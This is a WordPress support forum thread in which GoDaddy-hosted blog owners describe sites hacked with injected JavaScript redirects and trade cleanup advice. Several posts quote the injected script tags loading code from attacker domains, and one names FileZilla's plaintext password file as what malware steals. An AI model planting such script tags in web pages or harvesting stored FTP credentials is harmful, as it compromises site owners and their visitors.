• My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

    <script src=”http://cechirecom.com/js.php”></script&gt;

    I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.

    But what worries me is that I am careful about blog security. I always update to the latest WordPress install as soon as it comes out, I always check plugins and only use the bare minimum, I have very strong passwords…

    So…does anyone know if it could be Godaddy servers that have the problem? Or do I need to go through every WordPress hardening tip out there just to avoid this kind of thing?

Viewing 15 replies - 1 through 15 (of 29 total)
  • Hello Arthur,

    Same thing here. I just restored a website for a client 2 days ago and this morning it got this new malware. It has the same beginning injected code, but the script in the footer were different.

    We just restored it to yesterday’s date to see if that takes care of it.

    Check my blog post to see some things you can try.

    http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/

    Let me know if you need any help.

    Securely yours,

    Regina Smola

    A few of our customers were affected. Here’s what our CISO had to say about it:

    “WordPress is a-ok. Go Daddy is rock solid. Neither were ‘hacked,’ as some have speculated.

    After an extensive investigation, we can report there was a small group of customers negatively impacted. What happened? Those users had outdated versions of the popular blogging software, set up in a particular way.

    This underscores the importance of installing the latest Web applications, no matter where you are on the Internet. If you use Hosting Connection, automatically update WordPress to version 2.9.2 using the simple 3-step update offered when you log-in.

    And, while we’re on the topic of Web security and Best Practices – be sure all your online passwords are unique, secure, and in a safe place.”

    If you have questions or you’d like someone to take a look at your WordPress site, please get in touch with our 24/7 support team at http://fwd4.me/MBI

    Alicia

    I was hacked in the April 21 and now April 30. Go Daddy offered NO HELP. Said I would have to pay 150.00 to have them restore my hosting. Claimed it was not their fault. It would be most helpful if Go Daddy offered some assistance rather than denying they had any responsibility in the matter.

    redkathy,

    We’ve posted instructions for fixing the issue at http://fwd4.me/MFK. Please make sure that you follow all of the steps, including the ‘permanent fix’.

    Salem

    um…I can say, in total honesty, without hesitation, that the two blogs hosted on GoDaddy that I support were both running 2.9.2. I’m interested in what the “particular way” the compromised blogs were set up in…

    Hi, my blog was also hacked I think. I cannot submit replies to comments like I used to, WordPress runs slower than normal, and the Dashboard looks different when I open it up on Firefox. What do I need to do to restore it back to normal?

    @Hulbert: if you’re on a Linux server, you can restore an earlier version of your files: http://help.godaddy.com/article/5091
    GoDaddy has recommended backing up your database and any uploaded files, deleting your full WP installation, and reinstalling to the most recent version, but I don’t see how that is any better than restoring the files (unless there was a stray php file that was infected in the earlier version with potential to infect others). That method would be more complete, however, and may be an option of you’re on a Windows server and don’t have the option to restore from a previous backup (I’ve only tried the restore on a Linux server, so I don’t know if it’s possible or not on Windows, but the help doc only refers to this being possible on Linux).
    http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it/

    @jazzs3quence Thank you for your help. This is an email I got today.

    Hulbert,

    Thanks for your message. We did a scan of your website, and showed malicious malware scripts on your site:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    XML-RPC server accepts POST requests only.<script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Known javascript malware:
    <script src=”http://kdjkfjskdfjlskdjf.com/kp.php”></script&gt;

    Can I still use your method to solve this issue?

    Sorry to be so late jumping in here, but here goes.

    Many of these and other website infections are the result of stolen FTP or other login passwords.

    These are typically stolen by a virus on a PC that has FTP access to the infected website. Especially when the website has been re-infected a few times.

    I know everyone has anti-virus software installed, however, with so many variants of viruses the anti-virus (AV) companies have a difficult time keeping up. All it takes is one minute that your AV software isn’t up-to-date and you can be infected (well, your PC).

    From there the virus learns how to evade detection of the AV software. If you’re using one of the free FTP programs, like FileZilla and you store your passwords in the software so you don’t have to login each time you want to transfer files, the login credentials are stored in a plain text file.

    For FileZilla, you can see the file here:

    C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanger.xml (user could be Administrator if you’re logging into your PC as Administrator)

    All the information a virus needs is stored right there in plain text. It steals this information and sends it to a server which then logs in to the website downloads files, injects the malscript and then uploads them back to the website. If you have your FTP logs activated, you can see where the infected files came from.

    The virus also works by “sniffing” the FTP traffic. Since FTP transmits all data, including username and password in plain text, it’s easy for the virus to see and steal the information this way as well. I have a YouTube video showing this here: http://www.youtube.com/watch?v=oYI1kssrrbc

    Like I said the virus learns how to evade detection of the currently installed anti-virus software so you may need to use something different. Many have had good success with one of the following: Kaspersky, Avast or Vipre. If you’re already using one of these, then try one of the other two – it has to be different.

    So, first change all FTP passwords. I generally recommend setting up a separate username and password for each user and make sure FTP logging is activated. That way if you do get infected, you can look in the logs and know for certain who was cause.

    Second, install a new AV and scan all PCs.

    Third, remove the malscripts. If you have your website downloaded to your PC, you can use a program like grepWin (it’s free) to find and remove the malscript.

    Fourth, if Google has blacklisted you, you’ll have to request a review from the Google Webmaster tools.

    We clean websites for a living so I do know what I’m talking about here.

    Just so GD hosting knows this.

    I have personally helped fix over 23 Godaddy Hosted WordPress Hacked sites in the last 2 weeks.

    “WordPress is a-ok. Go Daddy is rock solid. Neither were ‘hacked,’ as some have speculated.”

    That quote is a little BS to me at this time.

    When users are FTP’ing up their wordpress installation they more then likely not know anything about permissions and did not set anything specific for their hosting.

    I am more prone to think that GoDaddy has a user account directory fail where the scripts can search directory structures to modify PHP files.

    Why do I believe this? Because on one of the GoDaddy accounts for the calamitiesofnature.com site they do *not* use wordpress and had the same hack in their PHP files.

    – Phil

    It’s a jungle out there.

    Hello I have just cleared the blog of the malscripts and done the setps recommended by WeWatch.

    My wp admin dashboard is still missmatched, how can I solve this?

    I posted a ton of solutions specific to a hacked WordPress account on Go Daddy. Don’t pay the $150. All they do is go into your File Manager, click on History and then the restore button. This will not work. You have to reinstall themes, sometimes plugins. It’s all in the article. Hope that helps if not just ask. Fix WordPress after Hack

    hi, i recieved an email

    WordPress Security Issue – Please Upgrade As Soon As Possible

    i already have the new version of wordpress

    I called godaddy and they said to call wordpress. (no listing for wordpress)

    anyways!!

    and my dashboard is messed up so i clicked on the 4 column and refreshed the page and it corrected the dashboard on the main dashboard but the

    post dashboard
    and so is the comment dashboard

    is messed up still.

    how can i get my dashboard to the normal way so i can continue with my blog.!!

    please. helpme111

Viewing 15 replies - 1 through 15 (of 29 total)
  • The topic ‘Godaddy wordpress blog hacked’ is closed to new replies.